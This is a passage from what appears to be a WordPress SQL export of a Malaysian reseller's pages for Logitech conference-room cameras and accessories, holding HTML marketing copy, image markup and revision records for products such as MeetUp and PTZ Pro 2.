srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 11:25:44','2019-03-04 03:25:44','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2960,1,'2019-03-04 12:55:13','2019-03-04 04:55:13','<h2>MEETUP</h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms</p><ul><li>See everyone, even those close to the camera</li><li>RightSenseâ„¢ Technologies with automatic framing</li><li>Compact design minimizes cabling and clutter</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>PERFECT FOR SMALL ROOMS</h2><p>MeetUp is Logitechâ€™s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsightâ„¢ auto framing plus a pan/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.</p>https://youtu.be/tD_tmRMN2OA<h3>A WIDE VIEW FOR TIGHT SPACES</h3><p>LogitechÂ® MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.</p><h3>HEARING IS BELIEVING</h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUpâ€™s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		https://youtu.be/CqeUIzYth_w<h3>AS EASY AS PLUG AND PLAY</h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.</p><h3>DESIGNED FOR THE WAY PEOPLE MEET</h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.</p>https://youtu.be/4xwIpyv3KOs		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"7f589de\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n		<h3>EXTRAS PROVIDE MORE CONVENIENCE</h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.</p><h4>5X ZOOM</h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.</p><h4>PREMIUM CAMERA OPTICS</h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a â€œfisheyeâ€ effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.</p><h4>EXPANSION MIC-READY</h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUpâ€™s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.</p><h4>CERTIFIED FOR BUSINESS</h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.</p><h4>BLUETOOTHÂ® SPEAKERPHONE</h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices canâ€™t match.</p><h4>TAKE CONTROL</h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.</p><h4>VERSATILE TV MOUNT</h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.</p><h4>RIGHTSENSE</h4><p>Logitech RightSenseâ„¢ proactive technologies make better video meetings easy and automatic.HÂ® RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.</p>','Logitech MEETUP','','inherit','closed','closed','','2928-revision-v1','','','2019-03-04 12:55:13','2019-03-04 04:55:13','',2928,'https://bintara.com.my/blog/2019/03/04/2928-revision-v1/',0,'revision','',0),(2954,1,'2019-03-04 11:27:59','2019-03-04 03:27:59','<h2>PTZ PRO 2</h2><p>HD 1080p video camera with enhanced pan/tilt and zoom</p><ul><li>See every detail with HD video and 10x zoom</li><li>Works with your meeting and video conferencing applications</li><li>Use with your existing audio system or speakerphone</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE</h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the cameraâ€™s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/JEoMD9m4K1k<h3>CAPTURE THE ACTION IN HIGH-DEF</h3><p>PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90Â° field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.</p><h3>EASY TO SET UP AND USE</h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and youâ€™re good to go. Designed for compatibility with video conferencing applications on WindowsÂ® and MacÂ® computers, PTZ Pro 2 complements any audio system or speakerphone.</p>		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"a3ffca9\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"a3ffca9\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n		<h3>OPERATE NEARBY OR FAR AWAY</h3><p>Pan, tilt, and zoom with the hand-held remote to see everything in your conference room, auditorium, classroom, or workspace. The camera can also be operated from a remote location with downloadable software.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PREMIUM CAMERA LENS</h4><p>PTZ Pro 2 features a premium camera lens, designed and manufactured by Logitech. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in.</p><h4>MULTIPLE MOUNTING OPTIONS</h4><p>Configure the conference rooms or event space any way you want: PTZ Pro 2 includes mounting hardware for both tabletop and wall mounting, and features a standard tripod thread for additional flexibility.</p><h4>PRESET AND FORGET</h4><p>Compose a wide shot so that everyone is in view. Smoothly switch between people and whiteboards. Perfectly frame each panelist for a broadcast-like experience. PTZ Pro 2 features three camera presets that save pan, tilt, and zoom settings, and smoothly transitions between them at the touch of a button.</p><h4>CERTIFIED FOR BUSINESS</h4><p>PTZ Pro 2 offers a plug-and-play USB connection to conference room computers. The camera is certified for Skype for Business, is Cisco WebEx compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with PTZ Pro 2.</p><p>[maxbutton id=\"3\"]</p>','Logitech PTZ PRO 2','','publish','closed','closed','','logitech-ptz-pro-2','','','2019-03-04 14:23:58','2019-03-04 06:23:58','',0,'https://bintara.com.my/?page_id=2954',0,'page','',0),(2955,1,'2019-03-04 11:27:59','2019-03-04 03:27:59','','Logitech PTZ PRO 2','','inherit','closed','closed','','2954-revision-v1','','','2019-03-04 11:27:59','2019-03-04 03:27:59','',2954,'https://bintara.com.my/blog/2019/03/04/2954-revision-v1/',0,'revision','',0),(2957,1,'2019-03-04 12:30:42','2019-03-04 04:30:42','','ptz-pro-2-camera (1)','','inherit','closed','closed','','ptz-pro-2-camera-1','','','2019-03-04 12:30:42','2019-03-04 04:30:42','',2954,'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg',0,'attachment','image/jpeg',0),(2958,1,'2019-03-04 12:30:46','2019-03-04 04:30:46','','ptz-pro-2-camera','','inherit','closed','closed','','ptz-pro-2-camera-2','','','2019-03-04 12:30:46','2019-03-04 04:30:46','',2954,'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg',0,'attachment','image/jpeg',0),(2959,1,'2019-03-04 12:32:22','2019-03-04 04:32:22','<p>PTZ PRO 2</p><p>HD 1080p video camera with enhanced pan/tilt and zoom</p><ul><li>See every detail with HD video and 10x zoom</li><li>Works with your meeting and video conferencing applications</li><li>Use with your existing audio system or speakerphone</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE</h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the cameraâ€™s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/JEoMD9m4K1k<h3>CAPTURE THE ACTION IN HIGH-DEF</h3><p>PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90Â° field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.</p><h3>EASY TO SET UP AND USE</h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and youâ€™re good to go. Designed for compatibility with video conferencing applications on WindowsÂ® and MacÂ® computers, PTZ Pro 2 complements any audio system or speakerphone.</p>		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>','Logitech PTZ PRO 2','','inherit','closed','closed','','2954-revision-v1','','','2019-03-04 12:32:22','2019-03-04 04:32:22','',2954,'https://bintara.com.my/blog/2019/03/04/2954-revision-v1/',0,'revision','',0),(2961,1,'2019-03-04 12:56:12','2019-03-04 04:56:12','','ptz-pro-2-camera (3)','','inherit','closed','closed','','ptz-pro-2-camera-3','','','2019-03-04 12:56:12','2019-03-04 04:56:12','',2954,'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg',0,'attachment','image/jpeg',0),(2962,1,'2019-03-04 12:56:16','2019-03-04 04:56:16','','ptz-pro-2-camera (2)','','inherit','closed','closed','','ptz-pro-2-camera-2-2','','','2019-03-04 12:56:16','2019-03-04 04:56:16','',2954,'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg',0,'attachment','image/jpeg',0),(2963,1,'2019-03-04 12:59:02','2019-03-04 04:59:02','<p>PTZ PRO 2</p><p>HD 1080p video camera with enhanced pan/tilt and zoom</p><ul><li>See every detail with HD video and 10x zoom</li><li>Works with your meeting and video conferencing applications</li><li>Use with your existing audio system or speakerphone</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>A LEAP FORWARD IN OPTICS AND PERFORMANCE</h2><p>Logitech PTZ Pro 2 delivers premium optics and life-like video to create the experience of sitting together in the same room, even if you are a thousand kilometers away. Technical improvements accent the cameraâ€™s brilliantly sharp image resolution, outstanding colour reproduction, and exceptional optical accuracy. At half the price of comparable models, PTZ Pro 2 is clearly the smart choice.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/JEoMD9m4K1k<h3>CAPTURE THE ACTION IN HIGH-DEF</h3><p>PTZ Pro 2 is the perfect fit for classrooms, auditoriums, and large meeting rooms. Capture a wide shot with a 90Â° field of view, or focus on presenters, panelists, and whiteboards with flexible pan and tilt controls. A 10x zoom lens with autofocus perfectly frames speakers and their visual aids, and delivers outstanding detail and clarity to remote participants and recording systems.</p><h3>EASY TO SET UP AND USE</h3><p>USB plug-and-play connectivity makes PTZ Pro 2 a breeze to deploy and use. Simply connect PTZ Pro 2 to the conference room computer or your laptop through USB, and youâ€™re good to go. Designed for compatibility with video conferencing applications on WindowsÂ® and MacÂ® computers, PTZ Pro 2 complements any audio system or speakerphone.</p>		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-1.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"af7a3b3\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"a3ffca9\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-3.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"a3ffca9\" href=\'https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg\'><img width=\"300\" height=\"169\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-300x169.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2-768x432.jpg 768w, https://bintara.com.my/wp-content/uploads/2019/03/ptz-pro-2-camera-2.jpg 930w\" sizes=\"(max-width: 300px) 100vw, 300px\" /></a>\n			</figure>\n		<h3>OPERATE NEARBY OR FAR AWAY</h3><p>Pan, tilt, and zoom with the hand-held remote to see everything in your conference room, auditorium, classroom, or workspace. The camera can also be operated from a remote location with downloadable software.</p>		\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>PREMIUM CAMERA LENS</h4><p>PTZ Pro 2 features a premium camera lens, designed and manufactured by Logitech. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in.</p><h4>MULTIPLE MOUNTING OPTIONS</h4><p>Configure the conference rooms or event space any way you want: PTZ Pro 2 includes mounting hardware for both tabletop and wall mounting, and features a standard tripod thread for additional flexibility.</p><h4>PRESET AND FORGET</h4><p>Compose a wide shot so that everyone is in view. Smoothly switch between people and whiteboards. Perfectly frame each panelist for a broadcast-like experience. PTZ Pro 2 features three camera presets that save pan, tilt, and zoom settings, and smoothly transitions between them at the touch of a button.</p><h4>CERTIFIED FOR BUSINESS</h4><p>PTZ Pro 2 offers a plug-and-play USB connection to conference room computers. The camera is certified for Skype for Business, is Cisco WebEx compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with PTZ Pro 2.</p>','Logitech PTZ PRO 2','','inherit','closed','closed','','2954-revision-v1','','','2019-03-04 12:59:02','2019-03-04 04:59:02','',2954,'https://bintara.com.my/blog/2019/03/04/2954-revision-v1/',0,'revision','',0),(2965,1,'2019-03-04 14:19:05','2019-03-04 06:19:05','<h2>PTZ PRO 2</h2><p>HD 1080p video camera with enhanced pan/tilt and zoom</p><ul><li>See every detail with HD video and 10x zoom</li><li>Works with your meeting and video conferencing applications</li><li>Use with your existing audio system or speakerphone</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w, 